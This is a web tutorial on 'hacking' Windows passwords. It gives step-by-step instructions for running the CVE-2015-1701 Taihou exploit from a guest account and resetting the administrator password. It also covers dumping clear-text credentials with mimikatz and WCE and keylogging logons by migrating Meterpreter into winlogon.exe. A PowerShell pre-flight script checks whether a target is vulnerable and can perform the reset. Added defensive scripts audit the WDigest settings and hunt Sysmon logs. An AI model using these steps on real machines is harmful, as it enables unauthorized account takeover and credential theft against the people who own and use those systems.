Hack Windows 7 Password from Guest Account using CVE-2015-1701 Exploit (Easy Way)

From Wikipedia

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

From the guest (unprivileged) command prompt, try the net user command to change the administrator password. It fails with "System error 5 has occurred. Access is denied." because a standard user is not allowed to modify other accounts.

Download the CVE-2015-1701 exploit from here and unzip it on your PC. Then go to the compiled folder inside the CVE-2015-1701-master directory. It contains two executables, one for 32-bit and one for 64-bit Windows (in my case a 64-bit system).

Now run Taihou64.exe (Taihou32.exe on a 32-bit system). It exploits the win32k.sys bug and spawns a new command prompt running with elevated privileges; confirm with whoami. From that prompt you can change the password with the net user command. Example is given below:

Syntax:

net user (username) *   then press Enter. You will be prompted to type the new password twice; the input is not echoed.

Note: This exploit works only on Windows 7 (all editions) that do not have MS15-051 (KB3045171, released May 2015) installed; once that update is applied, CVE-2015-1701 is patched. The public exploit does not support Windows 8 or Windows 10.
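Before running the exploit it is worth checking whether the target can be vulnerable at all, and afterwards whether the new prompt is really elevated. The following PowerShell script is an added example, not part of the original article or of the Taihou exploit: it checks the OS version, looks for KB3045171 (the MS15-051 update that fixes CVE-2015-1701) and reports whether the current shell is elevated. The $TargetUser default and the -ResetPassword switch are assumed placeholders for this example.

```powershell
# Added example (not from the original article): pre-flight check to run
# before and after launching Taihou64.exe. It confirms the target is
# Windows 7 / Server 2008 R2 (NT 6.1), whether MS15-051 (KB3045171, the fix
# for CVE-2015-1701) is present, and whether the current shell is already
# elevated. $TargetUser is an assumed placeholder for the account whose
# password you intend to reset.
param(
    [string]$TargetUser = 'Administrator',
    [switch]$ResetPassword
)

$ver    = [System.Environment]::OSVersion.Version
$isWin7 = ($ver.Major -eq 6 -and $ver.Minor -eq 1)

# Get-HotFix returns nothing (plus a non-terminating error we suppress)
# when the update is absent, so the cast yields $false in that case.
$patched = [bool](Get-HotFix -Id 'KB3045171' -ErrorAction SilentlyContinue)

$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
$elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

"OS version     : $ver  (Windows 7 / 2008 R2: $isWin7)"
"MS15-051 fixed : $patched"
"Running as     : $($identity.Name)  (elevated: $elevated)"

if (-not $isWin7) {
    Write-Warning 'Taihou targets NT 6.1 only; the public exploit does not support Windows 8/10.'
} elseif ($patched) {
    Write-Warning 'KB3045171 is installed; CVE-2015-1701 is patched on this host.'
} elseif (-not $elevated) {
    Write-Warning 'Not elevated: net user will fail with "Access is denied". Run Taihou64.exe first.'
}

if ($elevated -and $ResetPassword) {
    # The step the article describes, now from an elevated prompt.
    # net user prompts for the new password twice.
    net user $TargetUser *
} elseif ($elevated) {
    # Read-only view of the account until -ResetPassword is given.
    net user $TargetUser
}
```

Run it once from the guest prompt (it should report not elevated) and again from the prompt Taihou64.exe spawns; only the second run will let the password reset go through.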

Hack Windows Password in Clear Text using Mimikatz and Windows Credentials Editor

Mimikatz

mimikatz is a tool to check Windows security. It is now well known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash and pass-the-ticket attacks or build Golden Tickets.

First download the Windows build of mimikatz from here, right-click it and run it as Administrator (reading LSASS memory requires an administrator holding SeDebugPrivilege).

This opens the mimikatz console.

Type the following command to enable SeDebugPrivilege, which mimikatz needs in order to open the LSASS process:

privilege::debug

Now type the following command to dump the credentials of every logged-on user from LSASS. On Windows 7 the wdigest provider stores the password in clear text, so it is shown as plain text alongside the NTLM hash:

sekurlsa::logonPasswords

Windows Credentials Editor

Windows Credentials Editor (WCE) is a security tool that allows you to list Windows logon sessions and add, change, list and delete the credentials associated with them (e.g. LM/NT hashes, Kerberos tickets and clear text passwords).

First Download WCE from here.

Go to the WCE directory and run the following command from an administrator command prompt:

wce.exe -w

It prints the clear text passwords of the current logon sessions (like mimikatz, it reads them from the wdigest data held in LSASS).
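Both mimikatz (sekurlsa::logonPasswords) and WCE (wce.exe -w) only return clear text because of the way LSASS is configured on older Windows versions. The following PowerShell script is an added example, not part of the original article or of the mimikatz or WCE projects: it audits, and with -Fix corrects, the two settings that matter. The registry paths, the value names UseLogonCredential and RunAsPPL, and KB2871997 (the update that introduced UseLogonCredential) are Microsoft's; the version threshold logic is this example's own.

```powershell
# Added example, not from the original article or from the mimikatz/WCE
# projects: audit (and, with -Fix, change) the settings that decide whether
# sekurlsa::logonpasswords or wce.exe -w can return clear-text passwords.
#  * WDigest UseLogonCredential: Windows 7/8/2008 R2/2012 keep the clear-text
#    password in LSASS for WDigest; after KB2871997 the DWORD
#    UseLogonCredential=0 turns that off (Windows 8.1/2012 R2+ default to off).
#  * LSA RunAsPPL: on Windows 8.1/2012 R2+ runs LSASS as a protected process,
#    so unsigned user-mode tools cannot open it without a kernel driver.
param([switch]$Fix)

$WDigest = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$Lsa     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-RegValue([string]$Path, [string]$Name) {
    # Returns $null when the value does not exist instead of throwing.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($item) { $item.$Name } else { $null }
}

$ver = [System.Environment]::OSVersion.Version
# Windows 8.1 is NT 6.3; anything older keeps WDigest clear-text unless told not to.
$legacy = ($ver.Major -lt 6) -or ($ver.Major -eq 6 -and $ver.Minor -lt 3)

$useLogonCred = Get-RegValue $WDigest 'UseLogonCredential'
$runAsPpl     = Get-RegValue $Lsa 'RunAsPPL'
$kb2871997    = [bool](Get-HotFix -Id 'KB2871997' -ErrorAction SilentlyContinue)

# Missing value means "OS default": clear-text on legacy versions, off on 8.1+.
$wdigestExposed = if ($useLogonCred -eq $null) { $legacy } else { $useLogonCred -ne 0 }

"WDigest UseLogonCredential : $(if ($useLogonCred -eq $null) {'<not set>'} else {$useLogonCred})  -> clear-text in LSASS: $wdigestExposed"
"KB2871997 installed        : $kb2871997  (required on Windows 7/8/2008 R2/2012 for UseLogonCredential to take effect)"
"LSA RunAsPPL               : $(if ($runAsPpl -eq $null) {'<not set>'} else {$runAsPpl})  (only honoured on Windows 8.1/2012 R2+)"

if ($Fix) {
    # -Force overwrites the value if it already exists.
    New-ItemProperty -Path $WDigest -Name 'UseLogonCredential' -Value 0 -PropertyType DWord -Force | Out-Null
    if (-not $legacy) {
        New-ItemProperty -Path $Lsa -Name 'RunAsPPL' -Value 1 -PropertyType DWord -Force | Out-Null
    }
    Write-Warning 'UseLogonCredential affects new logons only and RunAsPPL needs a reboot; credentials already cached in LSASS stay there until those users log off.'
}
```

Run it as Administrator. On a stock Windows 7 host it reports UseLogonCredential as not set and clear-text exposure as True, which is exactly the state the two dumps above rely on; after -Fix (and a fresh logon) sekurlsa::logonPasswords still shows the NTLM hash but the wdigest password field is empty.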

Hack Remote Windows Password using Keylogger in Meterpreter

Once you have a Meterpreter session, use the ps command to list the running processes on the target and note the PID of winlogon.exe.

Next, migrate Meterpreter into the winlogon.exe process, which handles interactive logons, so the keylogger sees what is typed at the logon screen. winlogon.exe runs as SYSTEM, so you need SYSTEM privileges to inject into it (run getsystem first if you are not already SYSTEM). In this example the victim's winlogon.exe has process ID 600, so type migrate 600. Now the keylogger can be started:

keyscan_start – start the keylogger

keyscan_dump – print the captured keystrokes

keyscan_stop – stop the keylogger

While it runs, this captures the credentials of every user who logs in at the console. The keystrokes are held in memory inside the injected winlogon.exe process until you run keyscan_dump, so keep the session alive and dump regularly.
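Every technique on this page leaves a distinctive trace on the endpoint: mimikatz and WCE must open lsass.exe, and Meterpreter's migrate creates a thread inside winlogon.exe. The following PowerShell script is an added example, not part of the original article, Metasploit, mimikatz or WCE: it hunts for both in the Sysmon log, using event 10 (ProcessAccess) for LSASS access and event 8 (CreateRemoteThread) for winlogon injection. It assumes Sysmon is installed with those two event types enabled; the field names are Sysmon's, and the allow-list of processes expected to open LSASS is an assumed starting point you will need to tune for your environment.

```powershell
# Added example, not from the original article: hunt the Sysmon log for the
# two artefacts the techniques above leave on the endpoint:
#   Event 10 (ProcessAccess)      - a process opening lsass.exe, which is what
#                                   mimikatz and WCE do to read credentials;
#   Event 8  (CreateRemoteThread) - a thread created in winlogon.exe, which is
#                                   how Meterpreter's migrate plants itself.
# Assumes Sysmon is installed with ProcessAccess and CreateRemoteThread
# logging enabled. $expectedLsassClients is an assumed allow-list to tune.
param([int]$Hours = 24)

$log   = 'Microsoft-Windows-Sysmon/Operational'
$since = (Get-Date).AddHours(-$Hours)

# Processes that legitimately open LSASS on most hosts; extend for your EDR/AV.
$expectedLsassClients = @('csrss.exe', 'wininit.exe', 'services.exe', 'svchost.exe', 'MsMpEng.exe')

function Get-SysmonField([string]$Message, [string]$Field) {
    # Sysmon messages are "Field: value" lines; pull one value out of the text.
    if ($Message -match "(?m)^\s*${Field}:\s*(.+?)\s*$") { $Matches[1] } else { $null }
}

function Find-LsassAccess {
    Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 10; StartTime = $since } -ErrorAction SilentlyContinue |
        Where-Object { (Get-SysmonField $_.Message 'TargetImage') -like '*\lsass.exe' } |
        ForEach-Object {
            $src  = Get-SysmonField $_.Message 'SourceImage'
            $name = [IO.Path]::GetFileName($src)
            if ($expectedLsassClients -notcontains $name) {
                New-Object PSObject -Property @{
                    Time          = $_.TimeCreated
                    SourceImage   = $src
                    GrantedAccess = Get-SysmonField $_.Message 'GrantedAccess'
                }
            }
        }
}

function Find-WinlogonInjection {
    Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 8; StartTime = $since } -ErrorAction SilentlyContinue |
        Where-Object { (Get-SysmonField $_.Message 'TargetImage') -like '*\winlogon.exe' } |
        ForEach-Object {
            New-Object PSObject -Property @{
                Time          = $_.TimeCreated
                SourceImage   = Get-SysmonField $_.Message 'SourceImage'
                StartFunction = Get-SysmonField $_.Message 'StartFunction'
            }
        }
}

"== Unexpected processes opening lsass.exe (Sysmon event 10) =="
Find-LsassAccess | Format-Table -AutoSize
"== Remote threads created in winlogon.exe (Sysmon event 8) =="
Find-WinlogonInjection | Format-Table -AutoSize
```

Run it as Administrator on the host you want to check. In the first table, a GrantedAccess of 0x1010 or 0x1410 from an unexpected SourceImage is the pattern most commonly associated with mimikatz-style credential reads; in the second, any entry at all deserves a look, because legitimate software has very little reason to start threads inside winlogon.exe.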